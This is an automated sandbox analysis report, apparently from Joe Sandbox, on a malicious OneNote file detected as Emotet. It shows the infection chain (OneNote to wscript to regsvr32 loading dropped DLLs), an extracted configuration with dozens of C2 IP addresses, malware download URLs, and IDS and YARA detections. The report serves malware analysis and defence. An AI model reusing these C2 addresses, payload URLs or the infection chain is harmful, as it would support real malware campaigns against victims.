Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Insight_Medical_Publishing_1.one

Overview

General Information

Sample Name:Insight_Medical_Publishing_1.one
Analysis ID:828501
MD5:f44cb44a2dec6fce42d41a947ca5c120
SHA1:44672a849c91752c91fbbfeb91e300a3656352ea
SHA256:d894d541d5d911265a4e60a04c413939a14105072a67f5a3d50de2d0002d0003
Tags:one
Infos:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Malicious OneNote
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Sigma detected: Run temp file via regsvr32
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Stores files to the Windows start menu directory
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Creates a start menu entry (Start Menu\Programs\Startup)
Registers a DLL
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • ONENOTE.EXE (PID: 3308 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Insight_Medical_Publishing_1.one MD5: 8D7E99CB358318E1F38803C9E6B67867)
    • wscript.exe (PID: 2840 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf" MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • regsvr32.exe (PID: 4888 cmdline: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad617F4.tmp.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
        • regsvr32.exe (PID: 5108 cmdline: "C:\Users\user\AppData\Local\Temp\rad617F4.tmp.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
          • regsvr32.exe (PID: 2844 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FtYcgioKSiXTtw\clpHRoMLOOCr.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
    • ONENOTEM.EXE (PID: 5008 cmdline: /tsr MD5: DBCFA6F25577339B877D2305CAD3DEC3)
  • ONENOTEM.EXE (PID: 5060 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE" /tsr MD5: DBCFA6F25577339B877D2305CAD3DEC3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
EmotetWhile Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery. For example, since mid 2018 it is used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets.It is always stealing information from victims but what the criminal gang behind it did, was to open up another business channel by selling their infrastructure delivering additional malicious software. From malware analysts it has been classified into epochs depending on command and control, payloads, and delivery solutions which change over time.Emotet had been taken down by authorities in January 2021, though it appears to have sprung back to life in November 2021.
  • GOLD CABIN
  • MUMMY SPIDER
  • Mealybug
https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet

Malware Configuration

Threatname: Emotet

{"C2 list": ["91.121.146.47:8080", "66.228.32.31:7080", "182.162.143.56:443", "187.63.160.88:80", "167.172.199.165:8080", "164.90.222.65:443", "104.168.155.143:8080", "163.44.196.120:8080", "160.16.142.56:8080", "159.89.202.34:443", "159.65.88.10:8080", "186.194.240.217:443", "149.56.131.28:8080", "72.15.201.15:8080", "1.234.2.232:8080", "82.223.21.224:8080", "206.189.28.199:8080", "169.57.156.166:8080", "107.170.39.149:8080", "103.43.75.120:443", "91.207.28.33:8080", "213.239.212.5:443", "45.235.8.30:8080", "119.59.103.152:8080", "164.68.99.3:8080", "95.217.221.146:8080", "153.126.146.25:7080", "197.242.150.244:8080", "202.129.205.3:8080", "103.132.242.26:8080", "139.59.126.41:443", "110.232.117.186:8080", "183.111.227.137:8080", "5.135.159.50:443", "201.94.166.162:443", "103.75.201.2:443", "79.137.35.198:8080", "172.105.226.75:8080", "94.23.45.86:4143", "115.68.227.76:8080", "153.92.5.27:8080", "167.172.253.162:8080", "188.44.20.25:443", "147.139.166.154:8080", "129.232.188.93:443", "173.212.193.249:8080", "185.4.135.165:8080", "45.176.232.124:443"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5ek/BaQApAJA=", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2xU9saQAYAJA="]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Insight_Medical_Publishing_1.oneJoeSecurity_MalOneNoteYara detected Malicious OneNoteJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Desktop\Insight_Medical_Publishing_1.oneJoeSecurity_MalOneNoteYara detected Malicious OneNoteJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000000D.00000002.559981390.00000000008F0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        0000000D.00000002.560329835.0000000000921000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          0000000A.00000003.343720748.0000000005A23000.00000004.00000020.00020000.00000000.sdmpWEBSHELL_asp_genericGeneric ASP webshell which uses any eval/exec function indirectly on user input or writes a fileArnim Rupp
          • 0x39e:$asp_gen_obf1: "+"
          • 0x3ce:$asp_gen_obf1: "+"
          • 0x4212:$tagasp_classid1: 72C24DD5-D70A-438B-8A42-98424B88AFB8
          • 0x4332:$tagasp_classid1: 72C24DD5-D70A-438B-8A42-98424B88AFB8
          • 0x832:$jsp4: public
          • 0xe72:$jsp4: public
          • 0x1b2:$asp_input1: request
          • 0x9e0:$asp_input1: request
          • 0xa22:$asp_input1: request
          • 0xb38:$asp_input1: request
          • 0x4bb8:$asp_xml_method1: GET
          • 0x4ec:$asp_payload11: wscript.shell
          • 0xd4:$asp_multi_payload_one1: createobject
          • 0x1c2:$asp_multi_payload_one1: createobject
          • 0x23a:$asp_multi_payload_one1: createobject
          • 0x294:$asp_multi_payload_one1: createobject
          • 0x4d0:$asp_multi_payload_one1: createobject
          • 0xc36:$asp_multi_payload_one1: createobject
          • 0xf6e:$asp_multi_payload_one1: createobject
          • 0xf14:$asp_multi_payload_one3: .run
          • 0xd4:$asp_multi_payload_four1: createobject
          0000000D.00000002.560675790.00000000009C8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Emotet_3Yara detected EmotetJoe Security
            0000000C.00000002.315209574.0000000002550000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              Click to see the 1 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              13.2.regsvr32.exe.8f0000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                13.2.regsvr32.exe.8f0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  12.2.regsvr32.exe.2550000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    12.2.regsvr32.exe.2550000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security

                      Sigma Signatures

                      Malware Analysis System Evasion

                      barindex
                      Sigma detected: Run temp file via regsvr32
                      Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad617F4.tmp.dll, CommandLine: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad617F4.tmp.dll, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf", ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 2840, ParentProcessName: wscript.exe, ProcessCommandLine: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad617F4.tmp.dll, ProcessId: 4888, ProcessName: regsvr32.exe

                      Snort Signatures

                      Timestamp:192.168.2.791.121.146.474970480802404344 03/17/23-09:20:51.270439
                      SID:2404344
                      Source Port:49704
                      Destination Port:8080
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.7182.162.143.56497074432404312 03/17/23-09:21:02.839170
                      SID:2404312
                      Source Port:49707
                      Destination Port:443
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.766.228.32.314970670802404330 03/17/23-09:20:57.543366
                      SID:2404330
                      Source Port:49706
                      Destination Port:7080
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.7167.172.199.1654970980802404308 03/17/23-09:21:14.589789
                      SID:2404308
                      Source Port:49709
                      Destination Port:8080
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.7104.168.155.1434971480802404302 03/17/23-09:21:29.091364
                      SID:2404302
                      Source Port:49714
                      Destination Port:8080
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Multi AV Scanner detection for submitted file
                      Source: Insight_Medical_Publishing_1.oneReversingLabs: Detection: 33%
                      Source: Insight_Medical_Publishing_1.oneVirustotal: Detection: 42%Perma Link
                      Antivirus detection for URL or domain
                      Source: https://66.228.32.31:7080/Avira URL Cloud: Label: malware
                      Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/0Avira URL Cloud: Label: malware
                      Source: http://ozmeydan.com/cekici/9/Avira URL Cloud: Label: malware
                      Source: https://penshorn.org/admin/Ses8712iGR8du/tMAvira URL Cloud: Label: malware
                      Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/Avira URL Cloud: Label: malware
                      Source: https://104.168.155.143:8080/lAvira URL Cloud: Label: malware
                      Source: https://163.44.196.120:8080/acfnurik/pjkp/Avira URL Cloud: Label: malware
                      Source: https://159.89.202.34/acfnurik/pjkp/GAvira URL Cloud: Label: malware
                      Source: https://164.90.222.65/acfnurik/pjkp/-Avira URL Cloud: Label: malware
                      Source: https://91.121.146.47:8080/acfnurik/pjkp/Avira URL Cloud: Label: malware
                      Source: https://187.63.160.88:80/acfnurik/pjkp/qAvira URL Cloud: Label: malware
                      Source: https://104.168.155.143:8080/acfnurik/pjkp/Avira URL Cloud: Label: malware
                      Source: https://159.89.202.34/acfnurik/pjkp/Avira URL Cloud: Label: malware
                      Source: https://www.gomespontes.com.br/logs/pd/Avira URL Cloud: Label: malware
                      Source: https://159.65.88.10:8080/Avira URL Cloud: Label: malware
                      Source: https://163.44.196.120:8080/LAvira URL Cloud: Label: malware
                      Source: https://penshorn.org/admin/Ses8712iGR8du/otnAvira URL Cloud: Label: malware
                      Source: https://159.65.88.10:8080/acfnurik/pjkp/Avira URL Cloud: Label: malware
                      Source: http://ozmeydan.com/cekici/9/xMAvira URL Cloud: Label: malware
                      Source: http://softwareulike.com/cWIYxWMPkK/Avira URL Cloud: Label: malware
                      Source: https://penshorn.org:443/admin/Ses8712iGR8du/Avira URL Cloud: Label: malware
                      Multi AV Scanner detection for domain / URL
                      Source: penshorn.orgVirustotal: Detection: 10%Perma Link
                      Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/Virustotal: Detection: 20%Perma Link
                      Source: https://66.228.32.31:7080/Virustotal: Detection: 11%Perma Link
                      Source: http://ozmeydan.com/cekici/9/Virustotal: Detection: 15%Perma Link
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\rad617F4.tmp.dllReversingLabs: Detection: 58%
                      Source: C:\Windows\System32\FtYcgioKSiXTtw\clpHRoMLOOCr.dll (copy)ReversingLabs: Detection: 58%
                      Source: 0000000D.00000002.560675790.00000000009C8000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Emotet {"C2 list": ["91.121.146.47:8080", "66.228.32.31:7080", "182.162.143.56:443", "187.63.160.88:80", "167.172.199.165:8080", "164.90.222.65:443", "104.168.155.143:8080", "163.44.196.120:8080", "160.16.142.56:8080", "159.89.202.34:443", "159.65.88.10:8080", "186.194.240.217:443", "149.56.131.28:8080", "72.15.201.15:8080", "1.234.2.232:8080", "82.223.21.224:8080", "206.189.28.199:8080", "169.57.156.166:8080", "107.170.39.149:8080", "103.43.75.120:443", "91.207.28.33:8080", "213.239.212.5:443", "45.235.8.30:8080", "119.59.103.152:8080", "164.68.99.3:8080", "95.217.221.146:8080", "153.126.146.25:7080", "197.242.150.244:8080", "202.129.205.3:8080", "103.132.242.26:8080", "139.59.126.41:443", "110.232.117.186:8080", "183.111.227.137:8080", "5.135.159.50:443", "201.94.166.162:443", "103.75.201.2:443", "79.137.35.198:8080", "172.105.226.75:8080", "94.23.45.86:4143", "115.68.227.76:8080", "153.92.5.27:8080", "167.172.253.162:8080", "188.44.20.25:443", "147.139.166.154:8080", "129.232.188.93:443", "173.212.193.249:8080", "185.4.135.165:8080", "45.176.232.124:443"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5ek/BaQApAJA=", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2xU9saQAYAJA="]}
                      Source: unknownHTTPS traffic detected: 203.26.41.131:443 -> 192.168.2.7:49701 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.7:49707 version: TLS 1.2
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0000000180008D28 FindFirstFileExW,12_2_0000000180008D28

                      Software Vulnerabilities

                      barindex
                      Document exploit detected (process start blacklist hit)
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess created: C:\Windows\SysWOW64\wscript.exe

                      Networking

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 159.65.88.10 8080Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 164.90.222.65 443Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 203.26.41.131 443Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeDomain query: penshorn.org
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 66.228.32.31 7080Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 187.63.160.88 80Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 104.168.155.143 8080Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 159.89.202.34 443Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 91.121.146.47 8080Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 160.16.142.56 8080Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 182.162.143.56 443Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 167.172.199.165 8080Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 163.44.196.120 8080Jump to behavior
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2404312 ET CNC Feodo Tracker Reported CnC Server TCP group 7 192.168.2.7:49707 -> 182.162.143.56:443
                      Source: TrafficSnort IDS: 2404344 ET CNC Feodo Tracker Reported CnC Server TCP group 23 192.168.2.7:49704 -> 91.121.146.47:8080
                      Source: TrafficSnort IDS: 2404330 ET CNC Feodo Tracker Reported CnC Server TCP group 16 192.168.2.7:49706 -> 66.228.32.31:7080
                      Source: TrafficSnort IDS: 2404308 ET CNC Feodo Tracker Reported CnC Server TCP group 5 192.168.2.7:49709 -> 167.172.199.165:8080
                      Source: TrafficSnort IDS: 2404302 ET CNC Feodo Tracker Reported CnC Server TCP group 2 192.168.2.7:49714 -> 104.168.155.143:8080
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorIPs: 91.121.146.47:8080
                      Source: Malware configuration extractorIPs: 66.228.32.31:7080
                      Source: Malware configuration extractorIPs: 182.162.143.56:443
                      Source: Malware configuration extractorIPs: 187.63.160.88:80
                      Source: Malware configuration extractorIPs: 167.172.199.165:8080
                      Source: Malware configuration extractorIPs: 164.90.222.65:443
                      Source: Malware configuration extractorIPs: 104.168.155.143:8080
                      Source: Malware configuration extractorIPs: 163.44.196.120:8080
                      Source: Malware configuration extractorIPs: 160.16.142.56:8080
                      Source: Malware configuration extractorIPs: 159.89.202.34:443
                      Source: Malware configuration extractorIPs: 159.65.88.10:8080
                      Source: Malware configuration extractorIPs: 186.194.240.217:443
                      Source: Malware configuration extractorIPs: 149.56.131.28:8080
                      Source: Malware configuration extractorIPs: 72.15.201.15:8080
                      Source: Malware configuration extractorIPs: 1.234.2.232:8080
                      Source: Malware configuration extractorIPs: 82.223.21.224:8080
                      Source: Malware configuration extractorIPs: 206.189.28.199:8080
                      Source: Malware configuration extractorIPs: 169.57.156.166:8080
                      Source: Malware configuration extractorIPs: 107.170.39.149:8080
                      Source: Malware configuration extractorIPs: 103.43.75.120:443
                      Source: Malware configuration extractorIPs: 91.207.28.33:8080
                      Source: Malware configuration extractorIPs: 213.239.212.5:443
                      Source: Malware configuration extractorIPs: 45.235.8.30:8080
                      Source: Malware configuration extractorIPs: 119.59.103.152:8080
                      Source: Malware configuration extractorIPs: 164.68.99.3:8080
                      Source: Malware configuration extractorIPs: 95.217.221.146:8080
                      Source: Malware configuration extractorIPs: 153.126.146.25:7080
                      Source: Malware configuration extractorIPs: 197.242.150.244:8080
                      Source: Malware configuration extractorIPs: 202.129.205.3:8080
                      Source: Malware configuration extractorIPs: 103.132.242.26:8080
                      Source: Malware configuration extractorIPs: 139.59.126.41:443
                      Source: Malware configuration extractorIPs: 110.232.117.186:8080
                      Source: Malware configuration extractorIPs: 183.111.227.137:8080
                      Source: Malware configuration extractorIPs: 5.135.159.50:443
                      Source: Malware configuration extractorIPs: 201.94.166.162:443
                      Source: Malware configuration extractorIPs: 103.75.201.2:443
                      Source: Malware configuration extractorIPs: 79.137.35.198:8080
                      Source: Malware configuration extractorIPs: 172.105.226.75:8080
                      Source: Malware configuration extractorIPs: 94.23.45.86:4143
                      Source: Malware configuration extractorIPs: 115.68.227.76:8080
                      Source: Malware configuration extractorIPs: 153.92.5.27:8080
                      Source: Malware configuration extractorIPs: 167.172.253.162:8080
                      Source: Malware configuration extractorIPs: 188.44.20.25:443
                      Source: Malware configuration extractorIPs: 147.139.166.154:8080
                      Source: Malware configuration extractorIPs: 129.232.188.93:443
                      Source: Malware configuration extractorIPs: 173.212.193.249:8080
                      Source: Malware configuration extractorIPs: 185.4.135.165:8080
                      Source: Malware configuration extractorIPs: 45.176.232.124:443
                      Source: Joe Sandbox ViewASN Name: RACKCORP-APRackCorpAU RACKCORP-APRackCorpAU
                      Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                      Source: global trafficHTTP traffic detected: POST /acfnurik/pjkp/ HTTP/1.1Connection: Keep-AliveContent-Length: 0Host: 182.162.143.56
                      Source: Joe Sandbox ViewIP Address: 110.232.117.186 110.232.117.186
                      Source: global trafficHTTP traffic detected: GET /admin/Ses8712iGR8du/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: penshorn.org
                      Source: global trafficTCP traffic: 192.168.2.7:49704 -> 91.121.146.47:8080
                      Source: global trafficTCP traffic: 192.168.2.7:49706 -> 66.228.32.31:7080
                      Source: global trafficTCP traffic: 192.168.2.7:49709 -> 167.172.199.165:8080
                      Source: global trafficTCP traffic: 192.168.2.7:49714 -> 104.168.155.143:8080
                      Source: global trafficTCP traffic: 192.168.2.7:49715 -> 163.44.196.120:8080
                      Source: global trafficTCP traffic: 192.168.2.7:49716 -> 160.16.142.56:8080
                      Source: global trafficTCP traffic: 192.168.2.7:49721 -> 159.65.88.10:8080
                      Source: unknownNetwork traffic detected: IP country count 18
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                      Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                      Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                      Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                      Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                      Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                      Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                      Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                      Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                      Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
                      Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
                      Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
                      Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
                      Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
                      Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
                      Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
                      Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
                      Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
                      Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
                      Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
                      Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
                      Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
                      Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
                      Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
                      Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
                      Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
                      Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
                      Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
                      Source: wscript.exe, 0000000A.00000003.345217524.0000000005A86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.343202791.0000000005A86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.349225130.0000000005A86000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.532477535.0000000000A52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.533737252.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.400278720.0000000000A52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000002.561463201.0000000000A60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: regsvr32.exe, 0000000D.00000003.533737252.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.400278720.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000002.561463201.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.400278720.0000000000A52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.532477535.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.13.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: regsvr32.exe, 0000000D.00000003.396746413.0000000000AB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?0e63ba9029ba0
                      Source: regsvr32.exe, 0000000D.00000003.400051235.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.400361549.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000002.561180722.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.533810298.0000000000A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enEM32
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
